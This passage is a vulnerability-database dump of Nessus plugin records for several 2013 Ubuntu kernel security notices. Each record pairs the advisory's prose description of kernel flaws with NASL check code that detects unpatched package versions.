audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1947-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.5.0-40-generic\", pkgver:\"3.5.0-40.62~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T07:22:53", "description": "A denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service by\ncreating a large number of files with names that have the same CRC32\nhash value. (CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service\n(prevent file creation) for a victim, by creating a file with a\nspecific CRC32C hash value in a directory important to the victim.\n(CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw\nto run commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP\nto a guest OS. A privileged user in the guest OS could exploit this\nflaw to destroy data on the disk, even though the guest OS should not\nbe able to write to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "published": "2013-09-07T00:00:00", "title": "Ubuntu 12.10 : linux vulnerabilities (USN-1944-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic"], "id": "UBUNTU_USN-1944-1.NASL", "href": "https://www.tenable.com/plugins/nessus/69811", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1944-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69811);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_bugtraq_id(56939);\n script_xref(name:\"USN\", value:\"1944-1\");\n\n script_name(english:\"Ubuntu 12.10 : linux vulnerabilities (USN-1944-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service by\ncreating a large number of files with names that have the same CRC32\nhash value. (CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in\nthe Linux kernel. A local user could cause a denial of service\n(prevent file creation) for a victim, by creating a file with a\nspecific CRC32C hash value in a directory important to the victim.\n(CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw\nto run commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP\nto a guest OS. A privileged user in the guest OS could exploit this\nflaw to destroy data on the disk, even though the guest OS should not\nbe able to write to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1944-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.5-generic and / or\nlinux-image-3.5-highbank packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.5-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1944-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-40-generic\", pkgver:\"3.5.0-40.62\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"linux-image-3.5.0-40-highbank\", pkgver:\"3.5.0-40.62\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.5-generic / linux-image-3.5-highbank\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T07:22:52", "description": "Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw\nto run commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP\nto a guest OS. A privileged user in the guest OS could exploit this\nflaw to destroy data on the disk, even though the guest OS should not\nbe able to write to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "published": "2013-09-07T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-raring vulnerabilities (USN-1943-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1943-1.NASL", "href": "https://www.tenable.com/plugins/nessus/69810", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1943-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69810);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_xref(name:\"USN\", value:\"1943-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-raring vulnerabilities (USN-1943-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw\nto run commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP\nto a guest OS. A privileged user in the guest OS could exploit this\nflaw to destroy data on the disk, even though the guest OS should not\nbe able to write to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1943-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.8-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1943-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.8.0-30-generic\", pkgver:\"3.8.0-30.44~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.8-generic\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T07:22:51", "description": "Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows specified to be run as root. A local could exploit this flaw to\nrun commands as root when using the perf tool. user could exploit this\n(CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP\nto a guest OS. A privileged user in the guest OS could exploit this\nflaw to destroy data on the disk, even though the guest OS should not\nbe able to write to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "published": "2013-09-06T00:00:00", "title": "Ubuntu 13.04 : linux vulnerabilities (USN-1938-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic", "cpe:/o:canonical:ubuntu_linux:13.04"], "id": "UBUNTU_USN-1938-1.NASL", "href": "https://www.tenable.com/plugins/nessus/69798", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1938-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69798);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:29\");\n\n script_cve_id(\"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_bugtraq_id(60414, 60874, 60893, 61411, 61412);\n script_xref(name:\"USN\", value:\"1938-1\");\n\n script_name(english:\"Ubuntu 13.04 : linux vulnerabilities (USN-1938-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows specified to be run as root. A local could exploit this flaw to\nrun commands as root when using the perf tool. user could exploit this\n(CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP\nto a guest OS. A privileged user in the guest OS could exploit this\nflaw to destroy data on the disk, even though the guest OS should not\nbe able to write to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1938-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-3.8-generic package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.8-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:13.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(13\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 13.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-1938-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"13.04\", pkgname:\"linux-image-3.8.0-30-generic\", pkgver:\"3.8.0-30.44\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.8-generic\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T07:22:52", "description": "Chanam Park reported a NULL pointer flaw in the Linux kernel's Ceph\nclient. A remote attacker could exploit this flaw to cause a denial of\nservice (system crash). (CVE-2013-1059)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw\nto run commands as root when using the perf tool. (CVE-2013-1060)\n\nJonathan Salwan discovered an information leak in the Linux kernel's\ncdrom driver. A local user can exploit this leak to obtain sensitive\ninformation from kernel memory if the CD-ROM drive is malfunctioning.\n(CVE-2013-2164)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used\nto connect to an IPv4 destination. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash).\n(CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket\nimplementation in the Linux kernel. An local user could exploit this\nflaw to examine potentially sensitive information in kernel memory.\n(CVE-2013-2234)\n\nKees Cook discovered a format string vulnerability in the Linux\nkernel's disk block layer. A local user with administrator privileges\ncould exploit this flaw to gain kernel privileges. (CVE-2013-2851)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the\nLinux kernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2013-4163).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 29, "published": "2013-09-07T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-1941-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2164"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1941-1.NASL", "href": "https://www.tenable.com/plugins/nessus/69809", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1941-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of 